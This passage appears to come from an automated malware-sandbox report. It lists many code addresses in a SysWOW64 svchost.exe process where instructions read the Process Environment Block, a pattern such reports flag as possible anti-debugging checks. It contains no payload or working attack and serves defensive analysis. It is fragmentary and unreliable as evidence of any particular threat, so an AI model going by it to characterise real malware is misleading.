            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h]2_2_02FB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h]2_2_02F601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h]2_2_02F70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h]2_2_02F2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h]2_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h]2_2_02F60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF0115 mov eax, dword ptr fs:[00000030h]2_2_02FF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F666B0 mov eax, dword ptr fs:[00000030h]2_2_02F666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]2_2_02F6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62674 mov eax, dword ptr fs:[00000030h]2_2_02F62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4C640 mov eax, dword ptr fs:[00000030h]2_2_02F4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E627 mov eax, dword ptr fs:[00000030h]2_2_02F4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F66620 mov eax, dword ptr fs:[00000030h]2_2_02F66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68620 mov eax, dword ptr fs:[00000030h]2_2_02F68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3262C mov eax, dword ptr fs:[00000030h]2_2_02F3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72619 mov eax, dword ptr fs:[00000030h]2_2_02F72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE609 mov eax, dword ptr fs:[00000030h]2_2_02FAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]2_2_02FBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]2_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB07C3 mov eax, dword ptr fs:[00000030h]2_2_02FB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F307AF mov eax, dword ptr fs:[00000030h]2_2_02F307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE47A0 mov eax, dword ptr fs:[00000030h]2_2_02FE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD678E mov eax, dword ptr fs:[00000030h]2_2_02FD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38770 mov eax, dword ptr fs:[00000030h]2_2_02F38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30750 mov eax, dword ptr fs:[00000030h]2_2_02F30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE75D mov eax, dword ptr fs:[00000030h]2_2_02FBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4755 mov eax, dword ptr fs:[00000030h]2_2_02FB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov esi, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov ecx, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC730 mov eax, dword ptr fs:[00000030h]2_2_02FAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30710 mov eax, dword ptr fs:[00000030h]2_2_02F30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60710 mov eax, dword ptr fs:[00000030h]2_2_02F60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C700 mov eax, dword ptr fs:[00000030h]2_2_02F6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F304E5 mov ecx, dword ptr fs:[00000030h]2_2_02F304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F644B0 mov ecx, dword ptr fs:[00000030h]2_2_02F644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]2_2_02FBA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F364AB mov eax, dword ptr fs:[00000030h]2_2_02F364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA49A mov eax, dword ptr fs:[00000030h]2_2_02FEA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]2_2_02F5A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC460 mov ecx, dword ptr fs:[00000030h]2_2_02FBC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEA456 mov eax, dword ptr fs:[00000030h]2_2_02FEA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2645D mov eax, dword ptr fs:[00000030h]2_2_02F2645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5245A mov eax, dword ptr fs:[00000030h]2_2_02F5245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]2_2_02F6E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A430 mov eax, dword ptr fs:[00000030h]2_2_02F6A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]2_2_02F2E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C427 mov eax, dword ptr fs:[00000030h]2_2_02F2C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]2_2_02FB6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]2_2_02F68402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]2_2_02F5E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F325E0 mov eax, dword ptr fs:[00000030h]2_2_02F325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]2_2_02F6C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F365D0 mov eax, dword ptr fs:[00000030h]2_2_02F365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]2_2_02F6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]2_2_02F6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]2_2_02F545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]2_2_02FB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6E59C mov eax, dword ptr fs:[00000030h]2_2_02F6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h]2_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h]2_2_02F32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F64588 mov eax, dword ptr fs:[00000030h]2_2_02F64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]2_2_02F6656A
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h] (6 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h] (5 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FC6500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03004B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F30AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_03002B57 mov eax, dword ptr fs:[00000030h] (4 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F86AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FDEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F6CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F5EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02FBCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe  Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
